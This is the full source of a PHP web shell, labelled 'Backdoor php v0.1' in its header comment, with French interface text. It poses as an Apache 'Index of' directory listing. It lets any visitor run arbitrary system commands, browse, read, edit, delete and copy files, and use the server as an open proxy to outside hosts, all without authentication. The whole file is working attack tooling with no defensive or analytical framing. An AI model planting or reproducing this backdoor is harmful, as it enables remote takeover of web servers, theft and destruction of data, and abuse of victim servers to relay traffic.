<? /* Backdoor php v0.1 Coded By Charlichaplin charlichaplin@gmail.com Join me: irc.fr.worldnet.net #s-c Greetz: My dog :) */ class backdoor { var $pwd; var $rep; var $list = array(); var $file; var $edit; var $fichier; var $del; var $shell; var $proxy; function dir() { if(!empty($this->rep)) { $dir = opendir($this->rep); } else { $dir = opendir($this->pwd); } while($f = readdir($dir)) { if ($f !="." && $f != "..") { $this->list[] = $f; } } } function view() { $this->file = htmlentities(highlight_file($this->file)); } function edit() { if(!is_writable($this->edit)) { echo "Ecriture impossible sur le fichier"; } elseif(!file_exists($this->edit)) { echo "Le fichier n'existe pas "; } elseif(!$this->fichier) { $fp = fopen($this->edit,"r"); $a = ""; while(!feof($fp)) { $a .= fgets($fp,1024); } echo"<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?edit=".$this->edit."\"><textarea name=\"fichier\" cols=\"50\" rows=\"20\">".htmlentities($a)."</textarea><input name=\"Submit\" type=\"submit\"></form>"; } else { $fp = fopen($this->edit,"w+"); fwrite($fp, $this->fichier); fclose($fp); echo "Le fichier a été modifié"; } } function del() { if(is_file($this->del)) { if(unlink($this->del)) { echo "Fichier supprimé"; } else { echo "Vous n'avez pas les droits pour supprimer ce fichier"; } } else { echo $this->del." n'est pas un fichier"; } } function shell() { echo "<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."\"><input name=\"shell\" type=\"text\"><input type=\"submit\" name=\"Shell\"></form><br>"; system($this->shell); } function proxy($host,$page) { $fp = fsockopen($host,80); if (!$fp) { echo "impossible d'etablir un connection avec l'host"; } else { $header = "GET ".$page." HTTP/1.1\r\n"; $header .= "Host: ".$host."\r\n"; $header .= "Connection: close\r\n\r\n"; fputs($fp,$header); while (!feof($fp)) { $line = fgets($fp,1024); echo $line; } fclose($fp); } } function ccopy($cfichier,$cdestination) { if(!empty($cfichier) && !empty($cdestination)) { copy($cfichier, $cdestination); echo "Le fichier a été copié"; } else { echo "<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?copy=1\">Source: <input type=\"text\" name=\"cfichier\"><br>Destination: <input type=\"text\" name=\"cdestination\"><input type=\"submit\" title=\"Submit\"></form>"; } } } if(!empty($_REQUEST['rep'])) { $rep = $_REQUEST['rep']."/"; } $pwd = $_SERVER['SCRIPT_FILENAME']; $pwd2 = explode("/",$pwd); $file = $_REQUEST['file']; $edit = $_REQUEST['edit']; $fichier = $_POST['fichier']; $del = $_REQUEST['del']; $shell = $_REQUEST['shell']; $proxy = $_REQUEST['proxy']; $copy = $_REQUEST['copy']; $cfichier = $_POST['cfichier']; $cdestination = $_POST['cdestination']; $n = count($pwd2); $n = $n - 1; $pwd = ""; for ($i = 0;$i != $n;$i = $i+1) { $pwd .= "/".$pwd2[$i]; } if($proxy) { $host2 = explode("/",$proxy); $n = count($host2); $host = $host2[2]; $page = ""; for ($i = 3;$i != $n;$i = $i+1) { $page .= "/".$host2[$i]; } echo $page; } echo "<HTML><HEAD><TITLE>Index of ".$pwd."</TITLE>"; $backdoor = new backdoor(); $backdoor->pwd = $pwd; $backdoor->rep = $rep; $backdoor->file = $file; $backdoor->edit = $edit; $backdoor->fichier = $fichier; $backdoor->del = $del; $backdoor->shell = $shell; $backdoor->proxy = $proxy; echo "<TABLE><TR><TD bgcolor=\"#ffffff\" class=\"title\"><FONT size=\"+3\" face=\"Helvetica,Arial,sans-serif\"><B>Index of ".$backdoor->pwd."</B></FONT>"; $backdoor->dir(); echo "</TD></TR></TABLE><PRE>"; echo "<a href=\"".$_SERVER['PHP_SELF']."?shell=id\">Executer un shell</a> "; echo "<a href=\"".$_SERVER['PHP_SELF']."?proxy=http://www.cnil.fr/index.php?id=123\">Utiliser le serveur comme proxy</a> "; echo "<a href=\"".$_SERVER['PHP_SELF']."?copy=1\">Copier un fichier</a> <br>"; echo "<IMG border=\"0\" src=\"/icons/blank.gif\" ALT=\" \"> <A HREF=\"\">Name</A> <A HREF=\"\">Last modified</A> <A HREF=\"\">Size</A> <A HREF=\"\">Description</A>"; echo "<HR noshade align=\"left\" width=\"80%\">"; if($file) { $backdoor->view(); } elseif($edit) { $backdoor->edit(); } elseif($del) { $backdoor->del(); } elseif($shell) { $backdoor->shell(); }elseif($proxy) { $backdoor->proxy($host,$page); }elseif($copy == 1) { $backdoor->ccopy($cfichier,$cdestination); } else { echo "[DIR] <A HREF=\"".$_SERVER['PHP_SELF']."?rep=".realpath($rep."../")."\">Parent Directory</A> ".date("r",realpath($rep."../"))." - <br>"; foreach ($backdoor->list as $key => $value) { if(is_dir($rep.$value)) { echo "[DIR]<A HREF=\"".$_SERVER['PHP_SELF']."?rep=".$rep.$value."\">".$value."/</A> ".date("r",filemtime($rep.$value))." - <br>"; } else { echo "[FILE]<A HREF=\"".$_SERVER['PHP_SELF']."?file=".$rep.$value."\">".$value."</A> <a href=\"".$_SERVER['PHP_SELF']."?edit=".$rep.$value."\">(edit)</a> <a href=\"".$_SERVER['PHP_SELF']."?del=".$rep.$value."\">(del)</a> ".date("r",filemtime($rep.$value))." 1k <br>"; } } } echo "</PRE><HR noshade align=\"left\" width=\"80%\">"; echo "<center><b>Coded By Charlichaplin</b></center>"; echo "</BODY></HTML>";